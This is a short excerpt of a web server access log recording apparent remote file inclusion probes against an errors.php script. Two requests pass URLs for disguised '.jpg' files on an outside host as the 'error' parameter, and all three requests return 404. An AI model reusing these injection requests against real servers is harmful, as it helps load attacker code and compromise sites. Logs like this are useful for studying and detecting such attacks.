89.151.124.250 - - [02/Sep/2011:16:38:47 +0000] "GET /errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/copy.jpg?? HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:38:48 +0000] "GET /errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/paste.jpg?? HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:43:51 +0000] "GET /Account/access_log.txt/errors.php?error=test?? HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
